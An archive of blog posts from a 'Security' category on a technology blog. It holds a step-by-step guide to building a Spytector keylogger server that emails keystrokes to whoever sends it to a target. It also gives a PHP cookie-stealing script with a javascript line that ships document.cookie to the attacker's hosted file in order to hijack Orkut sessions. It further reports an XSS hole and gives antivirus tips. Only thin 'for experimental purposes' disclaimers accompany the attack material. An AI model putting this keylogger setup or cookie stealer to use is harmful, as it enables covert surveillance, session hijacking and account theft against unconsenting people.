Technology Blog

Archive for the ‘Security’ Category

Search Engine giant Google’s social networking website, Orkut allows you to set the privacy level of your profile (your page on Orkut which others see). All these features were not there in the old version of Orkut, but the new version of Orkut allows it all.

First of all a small intro on the dangers that people used face, it has also been accused as a medium for the death of some people. Some muslim countries have blocked Orkut.

Now Orkut is doing more for the privacy of its users. New features like only friends get to see albums and videos et cetera. This will considerably reduce abuse, unless you add bad people or unknown people into your friends list.

Go to http://www.orkut.com/PrivacySettings.aspx and change the settings as you like and thats all. Better be safe than sorry.

Program used: Spytector

Program Description: Spytector provides one of the best methods to have a look over what your loved ones are doing. It is a dangerous program and should not be used to harm others. It’s an undetectable Key Logger as the company claims, but only Avast Anti-Virus can catch it.

Download: http://www.spytector.com/download.html

Keylogger Basic Settings

Enter the settings in the basic settings option as shown above. These are the starting requirements. Your keylogging sever will be stored as hello.exe and log file name will be sat.txt, the Server will be stored in victims windows directory.

Keylogger Email Settings

Email settings is very important, it’s the location where the keylogger log files will be sent to. Put your email address and click on Get SMTP and the rest will be done by the program automatically.

This is all that you need to do, advance options can be ignored as this is the main requirement. After all the settings have been put correctly, click on build server and your keylogging server will be built. It will be in the directory where you have placed the Spytector main program. Never click open this server, you don’t want yourself to be attacked do you? Now send this server to the person who you want to monitor and his activities will be sent to you via email.

Disclaimer: If you do any non-sense with this keylogger, I will not be held responsible. This article is for information purpose only.

It is fixed now.

This is a XSS hole that can be used to steal cookies. I found it when I was doing a search in Pluralism.org and found this. I am going to inform them soon and I do have solution for them, if they want to listen to it that is.

Well the hole is simple, just follow this link, when you go there you’ll see a popup telling XSS. Same thing can be modified a little and converted to a cookie stealer.

Funny thing is this loop won’t cost them much, I think, but a hole is always a hole and fixing it will be good for both the website and it’s visitors.

My Email to their staff:

Hi,

There is a XSS hole in your search, I have written about it my site http://tech36.com/blog/xss-hole-in-pluralismcom/

It can be fixed.

Regards,

Prathik.

By reading this article you are agreeing to the point that you will not use this cookie stealing script to harm any one, but only for experimental purposes.

<?php
$c = $_GET['c'];
$file = fopen(’cookie.txt’,'a’);
fwrite($file,$c);
fclose($file);
?>

The above PHP code represents the simplest cookie stealing script, copy this and save it with the name c.php and upload it to any free PHP enabled server such as Freehostia or Awardspace. This script takes cookie from a javascript and then writes it into the file cookie.txt You can take a look at the cookie by opening the cookie.txt file. Now below I’ll give a javascript that can send the cookie to this PHP script.

javascript:document.location='location where you uploaded the script'+document.cookie;

Now to get Orkut cookie, you’ll have to login to Orkut and then run the script and then you’ll get Orkut cookies. You will not get Yahoo cookie if you run this from the page where you have logged into Orkut.

Cookies have login details but not passwords

Yeah, cookie does not have a password but it has login details that are required by the servers. It makes the servers think that you have already entered the password if you edit and put the cookies. Use Firefox add on “Add and Edit Cookies” for this purpose.

Disclaimer

This should be used for experimental reasons only and if you are found guilty of stealing another persons cookies, I will not be held responsible.

Viruses or Spyware, NOD32 kicks them all out but it’s not enough, the best combination is to use Spyware Doctor along with Nod32. I say this because my computer had Radmin server and Nod32 could not catch it but Spyware Doctor did, but then you may think that only Spyware Doctor is enough, nope it couldn’t detect SpyTechtor server which was detected by Nod32.

Working with Nod32

Download a trial version or make a subscription for 39$ in Eset.com and install it and that is no more setting change is required.

Working with Spyware Doctor

Download and install it, then go to control panel and select inteli-scan and perform regular scans.

With these two tools working together you’ll be safe. You can also try replacing Nod32 with Kaspersky, use the best combination. My computer was faster with Spyware Doctor and Nod32, hence I used that.